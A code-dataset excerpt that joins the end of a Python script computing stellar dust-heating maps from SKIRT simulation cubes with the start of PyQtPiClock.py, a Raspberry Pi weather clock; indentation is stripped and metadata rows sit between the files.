warmwls = wavelengths[startwl:coldstartwl-1]
coldwls = wavelengths[coldstartwl:]
delta_wls = delta_wls[startwl:]
# Compute global heating fracions
flux_all = input[startwl:,1]
input = np.loadtxt(inpath+inSED.replace('_i','_old_i'))
flux_old = input[startwl:,1]
input = np.loadtxt(inpath+inSED.replace('_i','_young_i'))
flux_young = input[startwl:,1]
Fold = 100. * (0.5*flux_old + 0.5*(flux_all-flux_young)) / flux_all
Fyoung = 100. * (0.5*flux_young + 0.5*(flux_all-flux_old)) / flux_all
Fold_alternative1 = 100. * flux_old / (flux_old + flux_young)
Fyoung_alternative1 = 100. * flux_young / (flux_old + flux_young)
Fold_alternative2 = 100. * flux_old / flux_all
Fyoung_alternative2 = 100. * flux_young / flux_all
Fold_alternative3 = 100. * np.sqrt(flux_old * (flux_all-flux_young))/flux_all
Fyoung_alternative3 = 100. * np.sqrt(flux_young * (flux_all-flux_old))/flux_all
Fold_alternative4 = 100. * (0.5*flux_old + 0.5*(flux_all-flux_young)) / (flux_old + flux_young)
Fyoung_alternative4 = 100. * (0.5*flux_young + 0.5*(flux_all-flux_old)) / (flux_old + flux_young)
# plt.subplot(211)
# ax1 = plt.scatter(np.log10(flux_all), np.log10(flux_old+flux_young), c = np.log10(dustwls))
# plt.plot([1.5,4.],[1.5,4.],'k-')
#
# plt.subplot(212)
# ax2 = plt.scatter(Fyoung/Fold, flux_young/flux_old, c = np.log10(dustwls))
# plt.plot([0.,1.2],[0.,1.2],'k-')
# plt.colorbar(ax2)
#
# plt.show()
JyToLsun = 1.e-26 * 4*np.pi*(0.785e6*3.086e+16)**2 * 3.e14/(dustwls**2) / Lsun # in Lsun/micron
totFlux = 0
totFlux_young = 0
totFlux_old = 0
for i in range(len(flux_all)-1):
totFlux += delta_wls[i] * flux_all[i] * JyToLsun[i]
totFlux_young += delta_wls[i] * flux_young[i] * JyToLsun[i]
totFlux_old += delta_wls[i] * flux_old[i] * JyToLsun[i]
print 'Total heating from old stars: ', totFlux_old/totFlux
print 'Total heating from young stars: ', totFlux_young/totFlux
####################################################
plt.figure(figsize=(7,5))
plt.ylabel('$F^\prime_{\lambda,\mathrm{unev.}}$ [$\%$]',fontsize=20)
plt.xlabel('$\lambda/\mu\mathrm{m}$',fontsize=20)
plt.xlim(10.,1.e3)
plt.ylim(0.,60.)
plt.xscale('log')
plt.tick_params(labelsize=20)
#plt.subplots_adjust(bottom=0.1)
#plt.plot(dustwls,Fold, 'r-', label="old stars")
plt.plot(dustwls,Fyoung, 'k-', label="Young SPs")
#plt.plot(dustwls,Fyoung_alternative1, 'r-', label="alt 1")
#plt.plot(dustwls,Fyoung_alternative2, 'g-', label="alt 2")
#plt.plot(dustwls,Fyoung_alternative3, 'c-', label="alt 3")
plt.plot(dustwls,Fyoung_alternative4, 'k-', label="alt 4")
plt.fill_between(dustwls, Fyoung, Fyoung_alternative4, color='grey', alpha='0.5')
plt.tight_layout()
#plt.legend(loc='upper left',numpoints=1,markerscale=1.5,fontsize=14)
plt.savefig(outpath+inSED.replace('sed.dat','heating.pdf'), format='pdf')
#plt.show()
plt.close()
# Make heating map
inCube = inSED.replace('sed.dat','total.fits')
makeHeatMap(inpath,outpath,inCube,startwl,dustwls,delta_wls)
#makeWarmHeatMap(inpath,outpath,inCube,startwl,coldstartwl-1, warmwls)
#makeColdHeatMap(inpath,outpath,inCube,coldstartwl, coldwls)
def makeHeatMap(inpath,outpath,inCube,startwl,dustwls, delta_wls):
cube = pyfits.open(inpath+inCube)
cube_all = cube[0].data[startwl:,0:,0:]
hdr_all = cube[0].header
cube = pyfits.open(inpath+inCube.replace('_i','_old_i'))
cube_old = cube[0].data[startwl:,0:,0:]
cube = pyfits.open(inpath+inCube.replace('_i','_young_i'))
cube_young = cube[0].data[startwl:,0:,0:]
Fold = 100. * (0.5*cube_old + 0.5*(cube_all-cube_young)) / cube_all
hdu = pyfits.PrimaryHDU( Fold,hdr_all)
hdu.writeto(outpath+"heatingFold.fits",clobber=True)
Fyoung = 100. * (0.5*cube_young + 0.5*(cube_all-cube_old)) / cube_all
hdu = pyfits.PrimaryHDU( Fyoung,hdr_all)
hdu.writeto(outpath+"heatingFyoung.fits",clobber=True)
pixelTot = integratePixelSEDs(cube_all, dustwls, delta_wls)
pixelOld = integratePixelSEDs(cube_old, dustwls, delta_wls)
pixelYoung = integratePixelSEDs(cube_young, dustwls, delta_wls)
# Get header with appropriate WCS info
im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
hdr_wcs = im36[0].header
hdu = pyfits.PrimaryHDU(pixelTot,hdr_wcs)
hdu.writeto(outpath+"Ldust_tot.fits",clobber=True)
hdu = pyfits.PrimaryHDU(pixelOld,hdr_wcs)
hdu.writeto(outpath+"Ldust_old.fits",clobber=True)
hdu = pyfits.PrimaryHDU(pixelYoung,hdr_wcs)
hdu.writeto(outpath+"Ldust_young.fits",clobber=True)
hdu = pyfits.PrimaryHDU(pixelOld/pixelTot,hdr_wcs)
hdu.writeto(outpath+"heatingTotOld.fits",clobber=True)
hdu = pyfits.PrimaryHDU(pixelYoung/pixelTot,hdr_wcs)
hdu.writeto(outpath+"heatingTotYoung.fits",clobber=True)
# OLD AND INCORRECT?
# tot_all = 100.* (dustwls[len(dustwls)-1] - dustwls[0])
#
# tot_old = integrateHeating(Fold,dustwls) / tot_all
# hdu = pyfits.PrimaryHDU(tot_old,hdr_wcs)
# hdu.writeto(outpath+"heatingTotOld.fits",clobber=True)
#
# tot_young = integrateHeating(Fyoung,dustwls) / tot_all
# hdu = pyfits.PrimaryHDU(tot_young,hdr_wcs)
# hdu.writeto(outpath+"heatingTotYoung.fits",clobber=True)
def makeWarmHeatMap(inpath,outpath,inCube,startwl,stopwl,warmwls):
cube = pyfits.open(inpath+inCube)
cube_all = cube[0].data[startwl:stopwl,0:,0:]
hdr_all = cube[0].header
cube = pyfits.open(inpath+inCube.replace('_i','_old_i'))
cube_old = cube[0].data[startwl:stopwl,0:,0:]
cube = pyfits.open(inpath+inCube.replace('_i','_young_i'))
cube_young = cube[0].data[startwl:stopwl,0:,0:]
Fold = 100. * (0.5*cube_old + 0.5*(cube_all-cube_young)) / cube_all
Fyoung = 100. * (0.5*cube_young + 0.5*(cube_all-cube_old)) / cube_all
tot_all = 100.* (warmwls[len(warmwls)-1] - warmwls[0])
# Get header with appropriate WCS info
im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
hdr_wcs = im36[0].header
tot_old = integrateHeating(Fold,warmwls) / tot_all
hdu = pyfits.PrimaryHDU(tot_old,hdr_wcs)
hdu.writeto(outpath+"heatingTotWarmOld.fits",clobber=True)
tot_young = integrateHeating(Fyoung,warmwls) / tot_all
hdu = pyfits.PrimaryHDU(tot_young,hdr_wcs)
hdu.writeto(outpath+"heatingTotWarmYoung.fits",clobber=True)
def makeColdHeatMap(inpath,outpath,inCube,startwl,coldwls):
cube = pyfits.open(inpath+inCube)
cube_all = cube[0].data[startwl:,0:,0:]
hdr_all = cube[0].header
cube = pyfits.open(inpath+inCube.replace('_i','_old_i'))
cube_old = cube[0].data[startwl:,0:,0:]
cube = pyfits.open(inpath+inCube.replace('_i','_young_i'))
cube_young = cube[0].data[startwl:,0:,0:]
Fold = 100. * (0.5*cube_old + 0.5*(cube_all-cube_young)) / cube_all
Fyoung = 100. * (0.5*cube_young + 0.5*(cube_all-cube_old)) / cube_all
tot_all = 100.* (coldwls[len(coldwls)-1] - coldwls[0])
# Get header with appropriate WCS info
im36 = pyfits.open("SKIRTinput/new3.6MJySr.fits")
hdr_wcs = im36[0].header
tot_old = integrateHeating(Fold,coldwls) / tot_all
hdu = pyfits.PrimaryHDU(tot_old,hdr_wcs)
hdu.writeto(outpath+"heatingTotColdOld.fits",clobber=True)
tot_young = integrateHeating(Fyoung,coldwls) / tot_all
hdu = pyfits.PrimaryHDU(tot_young,hdr_wcs)
hdu.writeto(outpath+"heatingTotColdYoung.fits",clobber=True)
def integratePixelSEDs(cube, wls, dwls):
Lsun = 3.846e26 # Watts
MjySr_to_LsunMicron = 1.e6 * (36./206264.806247)**2 * 1.e-26 * 4*np.pi*(0.785e6*3.086e+16)**2 * 3.e14/(wls**2) / Lsun
xaxis = len(cube[0,0,0:])
yaxis = len(cube[0,0:,0])
zaxis = len(cube[0:,0,0])
slice = np.zeros((yaxis,xaxis))
for i in range(0,yaxis):
for j in range(0,xaxis):
sed = cube[0:,i,j] # SED of pixel (i,j)
slice[i,j] = np.sum(sed * MjySr_to_LsunMicron * dwls)
return slice
def integrateHeating(cube,dustwls):
xaxis = len(cube[0,0,0:])
yaxis = len(cube[0,0:,0])
zaxis = len(cube[0:,0,0])
slice = np.zeros((yaxis,xaxis))
for i in range(0,yaxis):
for j in range(0,xaxis):
sed = cube[0:,i,j]
slice[i,j] = integrate.simps(sed,dustwls)
return slice
if __name__ == '__main__':
main() | 35.476868 | 121 | 0.641388 | 1,385 | 9,969 | 4.46787 | 0.184116 | 0.006787 | 0.039916 | 0.028442 | 0.529735 | 0.482385 | 0.446186 | 0.380414 | 0.363607 | 0.337427 | 0 | 0.044559 | 0.185074 | 9,969 | 281 | 122 | 35.476868 | 0.717011 | 0.19992 | 0 | 0.342105 | 0 | 0 | 0.089408 | 0.046863 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.039474 | null | null | 0.013158 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c518a7aefaa27641c2404d80d6ad365a3bb2bb2 | 40,140 | py | Python | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | 2 | 2017-07-03T16:13:27.000Z | 2017-07-03T16:13:49.000Z | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | null | null | null | Clock/PyQtPiClock.py | tonymorris/PiClock | d5a1b96eaef012834844b4c34e2344ec5671031b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*- # NOQA
import sys
import os
import platform
import signal
import datetime
import time
import json
import locale
import random
import re
from PyQt4 import QtGui, QtCore, QtNetwork
from PyQt4.QtGui import QPixmap, QMovie, QBrush, QColor, QPainter
from PyQt4.QtCore import QUrl
from PyQt4.QtCore import Qt
from PyQt4.QtNetwork import QNetworkReply
from PyQt4.QtNetwork import QNetworkRequest
from subprocess import Popen
sys.dont_write_bytecode = True
from GoogleMercatorProjection import getCorners # NOQA
import ApiKeys # NOQA
def tick():
global hourpixmap, minpixmap, secpixmap
global hourpixmap2, minpixmap2, secpixmap2
global lastmin, lastday, lasttimestr
global clockrect
global datex, datex2, datey2, pdy
if Config.DateLocale != "":
try:
locale.setlocale(locale.LC_TIME, Config.DateLocale)
except:
pass
now = datetime.datetime.now()
if Config.digital:
timestr = Config.digitalformat.format(now)
if Config.digitalformat.find("%I") > -1:
if timestr[0] == '0':
timestr = timestr[1:99]
if lasttimestr != timestr:
clockface.setText(timestr.lower())
lasttimestr = timestr
else:
angle = now.second * 6
ts = secpixmap.size()
secpixmap2 = secpixmap.transformed(
QtGui.QMatrix().scale(
float(clockrect.width()) / ts.height(),
float(clockrect.height()) / ts.height()
).rotate(angle),
Qt.SmoothTransformation
)
sechand.setPixmap(secpixmap2)
ts = secpixmap2.size()
sechand.setGeometry(
clockrect.center().x() - ts.width() / 2,
clockrect.center().y() - ts.height() / 2,
ts.width(),
ts.height()
)
if now.minute != lastmin:
lastmin = now.minute
angle = now.minute * 6
ts = minpixmap.size()
minpixmap2 = minpixmap.transformed(
QtGui.QMatrix().scale(
float(clockrect.width()) / ts.height(),
float(clockrect.height()) / ts.height()
).rotate(angle),
Qt.SmoothTransformation
)
minhand.setPixmap(minpixmap2)
ts = minpixmap2.size()
minhand.setGeometry(
clockrect.center().x() - ts.width() / 2,
clockrect.center().y() - ts.height() / 2,
ts.width(),
ts.height()
)
angle = ((now.hour % 12) + now.minute / 60.0) * 30.0
ts = hourpixmap.size()
hourpixmap2 = hourpixmap.transformed(
QtGui.QMatrix().scale(
float(clockrect.width()) / ts.height(),
float(clockrect.height()) / ts.height()
).rotate(angle),
Qt.SmoothTransformation
)
hourhand.setPixmap(hourpixmap2)
ts = hourpixmap2.size()
hourhand.setGeometry(
clockrect.center().x() - ts.width() / 2,
clockrect.center().y() - ts.height() / 2,
ts.width(),
ts.height()
)
dy = "{0:%I:%M %p}".format(now)
if dy != pdy:
pdy = dy
datey2.setText(dy)
if now.day != lastday:
lastday = now.day
# date
sup = 'th'
if (now.day == 1 or now.day == 21 or now.day == 31):
sup = 'st'
if (now.day == 2 or now.day == 22):
sup = 'nd'
if (now.day == 3 or now.day == 23):
sup = 'rd'
if Config.DateLocale != "":
sup = ""
ds = "{0:%A %B} {0.day}<sup>{1}</sup> {0.year}".format(now, sup)
datex.setText(ds)
datex2.setText(ds)
def tempfinished():
global tempreply, temp
if tempreply.error() != QNetworkReply.NoError:
return
tempstr = str(tempreply.readAll())
tempdata = json.loads(tempstr)
if tempdata['temp'] == '':
return
if Config.metric:
s = Config.LInsideTemp + \
"%3.1f" % ((float(tempdata['temp']) - 32.0) * 5.0 / 9.0)
if tempdata['temps']:
if len(tempdata['temps']) > 1:
s = ''
for tk in tempdata['temps']:
s += ' ' + tk + ':' + \
"%3.1f" % (
(float(tempdata['temps'][tk]) - 32.0) * 5.0 / 9.0)
else:
s = Config.LInsideTemp + tempdata['temp']
if tempdata['temps']:
if len(tempdata['temps']) > 1:
s = ''
for tk in tempdata['temps']:
s += ' ' + tk + ':' + tempdata['temps'][tk]
temp.setText(s)
def gettemp():
global tempreply
host = 'localhost'
if platform.uname()[1] == 'KW81':
host = 'piclock.local' # this is here just for testing
r = QUrl('http://' + host + ':48213/temp')
r = QNetworkRequest(r)
tempreply = manager.get(r)
tempreply.finished.connect(tempfinished)
def wxfinished():
global wxreply, wxdata
global wxicon, temper, wxdesc, press, humidity
global wind, wind2, wdate, bottom, forecast
global wxicon2, temper2, wxdesc
wxstr = str(wxreply.readAll())
wxdata = json.loads(wxstr)
f = wxdata['current_observation']
iconurl = f['icon_url']
icp = ''
if (re.search('/nt_', iconurl)):
icp = 'n_'
wxiconpixmap = QtGui.QPixmap(Config.icons + "/" + icp + f['icon'] + ".png")
wxicon.setPixmap(wxiconpixmap.scaled(
wxicon.width(), wxicon.height(), Qt.IgnoreAspectRatio,
Qt.SmoothTransformation))
wxicon2.setPixmap(wxiconpixmap.scaled(
wxicon.width(),
wxicon.height(),
Qt.IgnoreAspectRatio,
Qt.SmoothTransformation))
wxdesc.setText(f['weather'])
wxdesc2.setText(f['weather'])
if Config.metric:
temper.setText(str(f['temp_c']) + u'°C')
temper2.setText(str(f['temp_c']) + u'°C')
press.setText(Config.LPressure +
f['pressure_mb'] + ' ' + f['pressure_trend'])
humidity.setText(Config.LHumidity + f['relative_humidity'])
wd = f['wind_dir']
if Config.wind_degrees:
wd = str(f['wind_degrees']) + u'°'
wind.setText(Config.LWind +
wd + ' ' +
str(f['wind_kph']) +
Config.Lgusting +
str(f['wind_gust_kph']))
wind2.setText(Config.LFeelslike + str(f['feelslike_c']))
wdate.setText("{0:%H:%M}".format(datetime.datetime.fromtimestamp(
int(f['local_epoch']))) +
Config.LPrecip1hr + f['precip_1hr_metric'] + 'mm ' +
Config.LToday + f['precip_today_metric'] + 'mm')
else:
temper.setText(str(f['temp_f']) + u'°F')
temper2.setText(str(f['temp_f']) + u'°F')
press.setText(Config.LPressure +
f['pressure_in'] + ' ' + f['pressure_trend'])
humidity.setText(Config.LHumidity + f['relative_humidity'])
wd = f['wind_dir']
if Config.wind_degrees:
wd = str(f['wind_degrees']) + u'°'
wind.setText(Config.LWind + wd + ' ' +
str(f['wind_mph']) + Config.Lgusting +
str(f['wind_gust_mph']))
wind2.setText(Config.LFeelslike + str(f['feelslike_f']))
wdate.setText("{0:%H:%M}".format(datetime.datetime.fromtimestamp(
int(f['local_epoch']))) +
Config.LPrecip1hr + f['precip_1hr_in'] + 'in ' +
Config.LToday + f['precip_today_in'] + 'in')
bottom.setText(Config.LSunRise +
wxdata['sun_phase']['sunrise']['hour'] + ':' +
wxdata['sun_phase']['sunrise']['minute'] +
Config.LSet +
wxdata['sun_phase']['sunset']['hour'] + ':' +
wxdata['sun_phase']['sunset']['minute'] +
Config.LMoonPhase +
wxdata['moon_phase']['phaseofMoon']
)
for i in range(0, 3):
f = wxdata['hourly_forecast'][i * 3 + 2]
fl = forecast[i]
iconurl = f['icon_url']
icp = ''
if (re.search('/nt_', iconurl)):
icp = 'n_'
icon = fl.findChild(QtGui.QLabel, "icon")
wxiconpixmap = QtGui.QPixmap(
Config.icons + "/" + icp + f['icon'] + ".png")
icon.setPixmap(wxiconpixmap.scaled(
icon.width(),
icon.height(),
Qt.IgnoreAspectRatio,
Qt.SmoothTransformation))
wx = fl.findChild(QtGui.QLabel, "wx")
wx.setText(f['condition'])
day = fl.findChild(QtGui.QLabel, "day")
day.setText(f['FCTTIME']['weekday_name'] + ' ' + f['FCTTIME']['civil'])
wx2 = fl.findChild(QtGui.QLabel, "wx2")
s = ''
if float(f['pop']) > 0.0:
s += f['pop'] + '% '
if Config.metric:
if float(f['snow']['metric']) > 0.0:
s += Config.LSnow + f['snow']['metric'] + 'mm '
else:
if float(f['qpf']['metric']) > 0.0:
s += Config.LRain + f['qpf']['metric'] + 'mm '
s += f['temp']['metric'] + u'°C'
else:
if float(f['snow']['english']) > 0.0:
s += Config.LSnow + f['snow']['english'] + 'in '
else:
if float(f['qpf']['english']) > 0.0:
s += Config.LRain + f['qpf']['english'] + 'in '
s += f['temp']['english'] + u'°F'
wx2.setText(s)
for i in range(3, 9):
f = wxdata['forecast']['simpleforecast']['forecastday'][i - 3]
fl = forecast[i]
icon = fl.findChild(QtGui.QLabel, "icon")
wxiconpixmap = QtGui.QPixmap(Config.icons + "/" + f['icon'] + ".png")
icon.setPixmap(wxiconpixmap.scaled(
icon.width(),
icon.height(),
Qt.IgnoreAspectRatio,
Qt.SmoothTransformation))
wx = fl.findChild(QtGui.QLabel, "wx")
wx.setText(f['conditions'])
day = fl.findChild(QtGui.QLabel, "day")
day.setText(f['date']['weekday'])
wx2 = fl.findChild(QtGui.QLabel, "wx2")
s = ''
if float(f['pop']) > 0.0:
s += str(f['pop']) + '% '
if Config.metric:
if float(f['snow_allday']['cm']) > 0.0:
s += Config.LSnow + str(f['snow_allday']['cm']) + 'cm '
else:
if float(f['qpf_allday']['mm']) > 0.0:
s += Config.LRain + str(f['qpf_allday']['mm']) + 'mm '
s += str(f['high']['celsius']) + '/' + \
str(f['low']['celsius']) + u'°C'
else:
if float(f['snow_allday']['in']) > 0.0:
s += Config.LSnow + str(f['snow_allday']['in']) + 'in '
else:
if float(f['qpf_allday']['in']) > 0.0:
s += Config.LRain + str(f['qpf_allday']['in']) + 'in '
s += str(f['high']['fahrenheit']) + '/' + \
str(f['low']['fahrenheit']) + u'°F'
wx2.setText(s)
def getwx():
global wxurl
global wxreply
print "getting current and forecast:" + time.ctime()
wxurl = Config.wuprefix + ApiKeys.wuapi + \
'/conditions/astronomy/hourly10day/forecast10day/lang:' + \
Config.wuLanguage + '/q/'
wxurl += str(Config.wulocation.lat) + ',' + \
str(Config.wulocation.lng) + '.json'
wxurl += '?r=' + str(random.random())
print wxurl
r = QUrl(wxurl)
r = QNetworkRequest(r)
wxreply = manager.get(r)
wxreply.finished.connect(wxfinished)
def getallwx():
getwx()
def qtstart():
global ctimer, wxtimer, temptimer
global manager
global objradar1
global objradar2
global objradar3
global objradar4
getallwx()
gettemp()
objradar1.start(Config.radar_refresh * 60)
objradar1.wxstart()
objradar2.start(Config.radar_refresh * 60)
objradar2.wxstart()
objradar3.start(Config.radar_refresh * 60)
objradar4.start(Config.radar_refresh * 60)
ctimer = QtCore.QTimer()
ctimer.timeout.connect(tick)
ctimer.start(1000)
wxtimer = QtCore.QTimer()
wxtimer.timeout.connect(getallwx)
wxtimer.start(1000 * Config.weather_refresh *
60 + random.uniform(1000, 10000))
temptimer = QtCore.QTimer()
temptimer.timeout.connect(gettemp)
temptimer.start(1000 * 10 * 60 + random.uniform(1000, 10000))
class Radar(QtGui.QLabel):
def __init__(self, parent, radar, rect, myname):
global xscale, yscale
self.myname = myname
self.rect = rect
self.satellite = Config.satellite
try:
if radar["satellite"]:
self.satellite = 1
except KeyError:
pass
self.baseurl = self.mapurl(radar, rect, False)
print "google map base url: " + self.baseurl
self.mkurl = self.mapurl(radar, rect, True)
self.wxurl = self.radarurl(radar, rect)
print "radar url: " + self.wxurl
QtGui.QLabel.__init__(self, parent)
self.interval = Config.radar_refresh * 60
self.lastwx = 0
self.retries = 0
self.setObjectName("radar")
self.setGeometry(rect)
self.setStyleSheet("#radar { background-color: grey; }")
self.setAlignment(Qt.AlignCenter)
self.wwx = QtGui.QLabel(self)
self.wwx.setObjectName("wx")
self.wwx.setStyleSheet("#wx { background-color: transparent; }")
self.wwx.setGeometry(0, 0, rect.width(), rect.height())
self.wmk = QtGui.QLabel(self)
self.wmk.setObjectName("mk")
self.wmk.setStyleSheet("#mk { background-color: transparent; }")
self.wmk.setGeometry(0, 0, rect.width(), rect.height())
self.wxmovie = QMovie()
def mapurl(self, radar, rect, markersonly):
# 'https://maps.googleapis.com/maps/api/staticmap?maptype=hybrid¢er='+rcenter.lat+','+rcenter.lng+'&zoom='+rzoom+'&size=300x275'+markersr;
urlp = []
if len(ApiKeys.googleapi) > 0:
urlp.append('key=' + ApiKeys.googleapi)
urlp.append(
'center=' + str(radar['center'].lat) +
',' + str(radar['center'].lng))
zoom = radar['zoom']
rsize = rect.size()
if rsize.width() > 640 or rsize.height() > 640:
rsize = QtCore.QSize(rsize.width() / 2, rsize.height() / 2)
zoom -= 1
urlp.append('zoom=' + str(zoom))
urlp.append('size=' + str(rsize.width()) + 'x' + str(rsize.height()))
if markersonly:
urlp.append('style=visibility:off')
else:
urlp.append('maptype=hybrid')
for marker in radar['markers']:
marks = []
for opts in marker:
if opts != 'location':
marks.append(opts + ':' + marker[opts])
marks.append(str(marker['location'].lat) +
',' + str(marker['location'].lng))
urlp.append('markers=' + '|'.join(marks))
return 'http://maps.googleapis.com/maps/api/staticmap?' + \
'&'.join(urlp)
def radarurl(self, radar, rect):
# wuprefix = 'http://api.wunderground.com/api/';
# wuprefix+wuapi+'/animatedradar/image.gif?maxlat='+rNE.lat+'&maxlon='+
# rNE.lng+'&minlat='+rSW.lat+'&minlon='+rSW.lng+wuoptionsr;
# wuoptionsr = '&width=300&height=275&newmaps=0&reproj.automerc=1&num=5
# &delay=25&timelabel=1&timelabel.y=10&rainsnow=1&smooth=1';
rr = getCorners(radar['center'], radar['zoom'],
rect.width(), rect.height())
if self.satellite:
return (Config.wuprefix + ApiKeys.wuapi +
'/animatedsatellite/lang:' +
Config.wuLanguage +
'/image.gif' +
'?maxlat=' + str(rr['N']) +
'&maxlon=' + str(rr['E']) +
'&minlat=' + str(rr['S']) +
'&minlon=' + str(rr['W']) +
'&width=' + str(rect.width()) +
'&height=' + str(rect.height()) +
'&newmaps=0&reproj.automerc=1&num=5&delay=25' +
'&timelabel=1&timelabel.y=10&smooth=1&key=sat_ir4_bottom'
)
else:
return (Config.wuprefix +
ApiKeys.wuapi +
'/animatedradar/lang:' +
Config.wuLanguage + '/image.gif' +
'?maxlat=' + str(rr['N']) +
'&maxlon=' + str(rr['E']) +
'&minlat=' + str(rr['S']) +
'&minlon=' + str(rr['W']) +
'&width=' + str(rect.width()) +
'&height=' + str(rect.height()) +
'&newmaps=0&reproj.automerc=1&num=5&delay=25' +
'&timelabel=1&timelabel.y=10&rainsnow=1&smooth=1' +
'&radar_bitmap=1&xnoclutter=1&xnoclutter_mask=1&cors=1'
)
def basefinished(self):
if self.basereply.error() != QNetworkReply.NoError:
return
self.basepixmap = QPixmap()
self.basepixmap.loadFromData(self.basereply.readAll())
if self.basepixmap.size() != self.rect.size():
self.basepixmap = self.basepixmap.scaled(self.rect.size(),
Qt.KeepAspectRatio,
Qt.SmoothTransformation)
if self.satellite:
p = QPixmap(self.basepixmap.size())
p.fill(Qt.transparent)
painter = QPainter()
painter.begin(p)
painter.setOpacity(0.6)
painter.drawPixmap(0, 0, self.basepixmap)
painter.end()
self.basepixmap = p
self.wwx.setPixmap(self.basepixmap)
else:
self.setPixmap(self.basepixmap)
def mkfinished(self):
if self.mkreply.error() != QNetworkReply.NoError:
return
self.mkpixmap = QPixmap()
self.mkpixmap.loadFromData(self.mkreply.readAll())
if self.mkpixmap.size() != self.rect.size():
self.mkpixmap = self.mkpixmap.scaled(
self.rect.size(),
Qt.KeepAspectRatio,
Qt.SmoothTransformation)
br = QBrush(QColor(Config.dimcolor))
painter = QPainter()
painter.begin(self.mkpixmap)
painter.fillRect(0, 0, self.mkpixmap.width(),
self.mkpixmap.height(), br)
painter.end()
self.wmk.setPixmap(self.mkpixmap)
def wxfinished(self):
if self.wxreply.error() != QNetworkReply.NoError:
print "get radar error " + self.myname + ":" + \
str(self.wxreply.error())
self.lastwx = 0
return
print "radar map received:" + self.myname + ":" + time.ctime()
self.wxmovie.stop()
self.wxdata = QtCore.QByteArray(self.wxreply.readAll())
self.wxbuff = QtCore.QBuffer(self.wxdata)
self.wxbuff.open(QtCore.QIODevice.ReadOnly)
mov = QMovie(self.wxbuff, 'GIF')
print "radar map frame count:" + self.myname + ":" + \
str(mov.frameCount()) + ":r" + str(self.retries)
if mov.frameCount() > 2:
self.lastwx = time.time()
self.retries = 0
else:
# radar image retreval failed
if self.retries > 3:
# give up, last successful animation stays.
# the next normal radar_refresh time (default 10min) will apply
self.lastwx = time.time()
return
self.lastwx = 0
# count retries
self.retries = self.retries + 1
# retry in 5 seconds
QtCore.QTimer.singleShot(5 * 1000, self.getwx)
return
self.wxmovie = mov
if self.satellite:
self.setMovie(self.wxmovie)
else:
self.wwx.setMovie(self.wxmovie)
if self.parent().isVisible():
self.wxmovie.start()
def getwx(self):
global lastapiget
i = 0.1
# making sure there is at least 2 seconds between radar api calls
lastapiget += 2
if time.time() > lastapiget:
lastapiget = time.time()
else:
i = lastapiget - time.time()
print "get radar api call spacing oneshot get i=" + str(i)
QtCore.QTimer.singleShot(i * 1000, self.getwx2)
def getwx2(self):
global manager
try:
if self.wxreply.isRunning():
return
except Exception:
pass
print "getting radar map " + self.myname + ":" + time.ctime()
self.wxreq = QNetworkRequest(
QUrl(self.wxurl + '&rrrand=' + str(time.time())))
self.wxreply = manager.get(self.wxreq)
QtCore.QObject.connect(self.wxreply, QtCore.SIGNAL(
"finished()"), self.wxfinished)
def getbase(self):
global manager
self.basereq = QNetworkRequest(QUrl(self.baseurl))
self.basereply = manager.get(self.basereq)
QtCore.QObject.connect(self.basereply, QtCore.SIGNAL(
"finished()"), self.basefinished)
def getmk(self):
global manager
self.mkreq = QNetworkRequest(QUrl(self.mkurl))
self.mkreply = manager.get(self.mkreq)
QtCore.QObject.connect(self.mkreply, QtCore.SIGNAL(
"finished()"), self.mkfinished)
def start(self, interval=0):
if interval > 0:
self.interval = interval
self.getbase()
self.getmk()
self.timer = QtCore.QTimer()
QtCore.QObject.connect(
self.timer, QtCore.SIGNAL("timeout()"), self.getwx)
def wxstart(self):
print "wxstart for " + self.myname
if (self.lastwx == 0 or (self.lastwx + self.interval) < time.time()):
self.getwx()
# random 1 to 10 seconds added to refresh interval to spread the
# queries over time
i = (self.interval + random.uniform(1, 10)) * 1000
self.timer.start(i)
self.wxmovie.start()
QtCore.QTimer.singleShot(1000, self.wxmovie.start)
def wxstop(self):
print "wxstop for " + self.myname
self.timer.stop()
self.wxmovie.stop()
def stop(self):
try:
self.timer.stop()
self.timer = None
if self.wxmovie:
self.wxmovie.stop()
except Exception:
pass
def realquit():
QtGui.QApplication.exit(0)
def myquit(a=0, b=0):
global objradar1, objradar2, objradar3, objradar4
global ctimer, wtimer, temptimer
objradar1.stop()
objradar2.stop()
objradar3.stop()
objradar4.stop()
ctimer.stop()
wxtimer.stop()
temptimer.stop()
QtCore.QTimer.singleShot(30, realquit)
def fixupframe(frame, onoff):
for child in frame.children():
if isinstance(child, Radar):
if onoff:
# print "calling wxstart on radar on ",frame.objectName()
child.wxstart()
else:
# print "calling wxstop on radar on ",frame.objectName()
child.wxstop()
def nextframe(plusminus):
global frames, framep
frames[framep].setVisible(False)
fixupframe(frames[framep], False)
framep += plusminus
if framep >= len(frames):
framep = 0
if framep < 0:
framep = len(frames) - 1
frames[framep].setVisible(True)
fixupframe(frames[framep], True)
class myMain(QtGui.QWidget):
def keyPressEvent(self, event):
global weatherplayer, lastkeytime
if isinstance(event, QtGui.QKeyEvent):
# print event.key(), format(event.key(), '08x')
if event.key() == Qt.Key_F4:
myquit()
if event.key() == Qt.Key_F2:
if time.time() > lastkeytime:
if weatherplayer is None:
weatherplayer = Popen(
["mpg123", "-q", Config.noaastream])
else:
weatherplayer.kill()
weatherplayer = None
lastkeytime = time.time() + 2
if event.key() == Qt.Key_Space:
nextframe(1)
if event.key() == Qt.Key_Left:
nextframe(-1)
if event.key() == Qt.Key_Right:
nextframe(1)
def mousePressEvent(self, event):
if type(event) == QtGui.QMouseEvent:
nextframe(1)
configname = 'Config'
if len(sys.argv) > 1:
configname = sys.argv[1]
if not os.path.isfile(configname + ".py"):
print "Config file not found %s" % configname + ".py"
exit(1)
Config = __import__(configname)
# define default values for new/optional config variables.
try:
Config.metric
except AttributeError:
Config.metric = 0
try:
Config.weather_refresh
